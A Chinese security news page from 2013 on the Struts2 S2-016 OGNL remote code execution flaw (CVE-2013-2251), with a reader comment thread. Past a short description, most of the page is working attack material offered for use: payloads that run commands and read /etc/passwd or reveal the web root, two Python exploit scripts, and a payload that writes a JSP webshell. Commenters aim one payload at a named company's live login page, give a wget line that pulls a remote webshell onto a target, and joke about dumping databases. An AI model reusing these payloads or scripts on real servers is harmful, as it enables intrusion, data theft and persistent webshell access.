刘洲成qq

刘洲成qq
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
[更新]Struts2再爆远程代码执行漏洞（S2-016） phper2013-07-17共1539316人围观 ，发现 61 个不明物体 漏洞
Struts又爆远程代码执行漏洞了！在这次的漏洞中，攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本，参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行。

描述

影响版本 Struts 2.0.0 - Struts 2.3.15
报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号 CVE-2013-2251
漏洞证明

参数会以OGNL表达式执行

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
代码执行

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Apache官方地址

国内网站受灾严重

以下仅供教学研究之用，严禁非法用途！

执行任意命令EXP，感谢X提供：

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆网站路径EXP，感谢h4ck0r提供：

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
python执行任意命令，感谢h4ck0r提供

import urllib2,sys,re

def get(url, data):
string = url + "?" + data
req = urllib2.Request("%s"%string)
response = urllib2.urlopen(req).read().strip()
print strip(response)

def strip(str):
tmp = str.strip()
blank_line=re.compile('\x00')
tmp=blank_line.sub('',tmp)
return tmp

if __name__ == '__main__':
url = sys.argv[1]
cmd = sys.argv[2]
cmd1 = sys.argv[3]
attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
get(url,attack)
GETSHELL EXP，感谢coffee提供：

?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%
然后用以下代码写shell:

上前目录生成1.jsp

phper
||
上一篇：Android ICS adb调试工具系统还原目录遍历漏洞（可提权）下一篇：对国内各种安全卫士产品的一种通用虐杀、DLL注入、本地代码执行的方法
这些评论亮了

X 回复
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
)40(亮了

命运 回复
不息抢沙发好速度，话说乌云又有SB在刷分了。黑产的大好机会不把握，呵呵。
)27(亮了

hackmissmiss (1级)回复
刷你妈的分 一群小朋友 为了满足自己的虚荣心 不停的找网站刷分 SB
)25(亮了

生生不息 回复
https://kf.sf-express.com/css/loginmgmt/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
)19(亮了

fake 回复

乌云已经开始了……黑阔们拖库吧……
)17(亮了
发表评论已有 60 条评论

生生不息 2013-07-17回复 1楼
目测利用工具马上出炉

POC来自官方：

http://struts.apache.org/release/2.3.x/docs/s2-016.html

http://struts.apache.org/release/2.3.x/docs/s2-017.htm

。。碉堡不

亮了(6)

fake 2013-07-17回复 2楼

乌云已经开始了……黑阔们拖库吧……

亮了(17)

命运 2013-07-17回复 3楼
不息抢沙发好速度，话说乌云又有SB在刷分了。黑产的大好机会不把握，呵呵。

亮了(27)

n0bele (1级) alert(document.cookie) 2013-07-17回复 4楼
这真是个好厂商，没它黑帽子和那些又做黑产又做白帽子的帽子都快戴不稳了.

亮了(9)

hackmissmiss (1级) 2013-07-17回复 5楼
刷你妈的分 一群小朋友 为了满足自己的虚荣心 不停的找网站刷分 SB

亮了(25)

蓝风 (1级) 2013-07-17回复 6楼
少侠 记得提下裤子。。。。。。

亮了(1)

mujj (1级) 2013-07-17回复 7楼
刷分又开始了么

亮了(1)

angellover08 (4级) 2013-07-17回复 8楼
想投身黑产，木有门路啊

亮了(2)

z0mbie 2013-07-17回复 9楼
小弟看不懂，哪位能给个执行命令的语句

亮了(9)

uj70ky7b (1级) 2013-07-17回复 10楼
刷你妹妹的分啊，能吃吗. 一分等于几万块啊。

亮了(11)

X 2013-07-17回复 11楼
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

亮了(40)

yplinfo (1级) 2013-07-17回复 12楼
哎，SB才刷分

亮了(1)

Cr0w 2013-07-17回复 13楼
S2-17

http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/

http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23

亮了(3)

生生不息 2013-07-17回复 14楼
https://kf.sf-express.com/css/loginmgmt/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

亮了(19)

lock 认证作者(6级) 独立安全研究员 2013-07-17回复 15楼

import urllib2,getopt,sys

def info():

print "python struts.py -u http://baidu.com/test.action -d whoami"

def get(url, data):

string = url + "?" + data

req = urllib2.Request(string)

response = urllib2.urlopen(req)

print response.read()

if __name__ == '__main__' and len(sys.argv) < 2: info() try: opts, args = getopt.getopt(sys.argv[1:],"u:d:") except: sys.exit(2) for opt, value in opts: if opt == '-u': url = value elif opt == '-d': test = value attack="?redirect:${#a=(new java.lang.ProcessBuilder('%s')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}"%test get(url,attack) 亮了(8) 二手玫瑰 (1级) 2013-07-17回复 16楼 麻烦各位大神提供爆网站绝对路径的办法。。。。 亮了(0) h4ck0r 2013-07-17回复 @二手玫瑰 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 亮了(1) pnig0s 认证作者(7级) FreeBuf技术处书记 2013-07-17回复 17楼 评论里各路大神都发威了：） 亮了(0) 元首 (2级) 2013-07-17回复 18楼 路径 http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 亮了(2) angellover08 (4级) 2013-07-17回复 19楼 freebuf大牛众多，小弟在此膜拜。 亮了(0) xiao_hen (4级) 人是无法在快乐中成长的。快乐只能使人肤浅，我们在痛苦中成长，... 2013-07-17回复 20楼 freebuf大牛众多，小弟在此膜拜。 亮了(0) dennych0u (1级) 2013-07-17回复 21楼 悲催的攻城狮们要精尽人亡了~ 亮了(0) z0mbie 2013-07-17回复 22楼 请教各路神仙，怎么反弹SHELL,怎么写shell 亮了(0) 河蟹是亲爱的 2013-07-17回复 23楼 getshell wget http://www.sss.com/data/avatar/test.txt -O /home/www/test.jsp test.txt是远程webshell的 /home/www/test.jsp 是目标目录 亮了(1) hackmissmiss (1级) 2013-07-17回复 24楼 怎么构造WGET POC 亮了(0) free (1级) 2013-07-17回复 25楼 求工具啊 亮了(0) h4ck0r 2013-07-17回复 26楼 执行任意命令： example:python test.py http://baidu.com/test.action cat /etc/passwd import urllib2,sys,re def get(url, data): string = url + “?” + data req = urllib2.Request(“%s”%string) response = urllib2.urlopen(req).read().strip() print strip(response) def strip(str): tmp = str.strip() blank_line=re.compile(‘\x00′) tmp=blank_line.sub(”,tmp) return tmp if __name__ == ‘__main__’: url = sys.argv[1] cmd = sys.argv[2] cmd1 = sys.argv[3] attack=”redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{‘%s’,'%s’})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}”%(cmd,cmd1) get(url,attack) 亮了(2) Hell0w0rld 2013-07-17回复 @h4ck0r IndentationError: expected an indented block 亮了(0) coffee 2013-07-17回复 27楼 我来个写shell的吧,当前目录生成test.jsp ?redirect:${ %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), %23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"), new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close() }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e 然后用以下代码写shell:

上前目录生成1.jsp

亮了(4)

apo 2013-07-18回复
@coffee 我来个写shell的吧,当前目录生成test.jsp

?redirect:${

%23req%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),

new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

然后用以下代码写shell:

上前目录生成1.jsp

少了一个name=t code

亮了(2)

window 2013-07-18回复
@apo 能生存test.jsp不能生成1.jsp啊！

亮了(0)

apo 2013-07-18回复
@window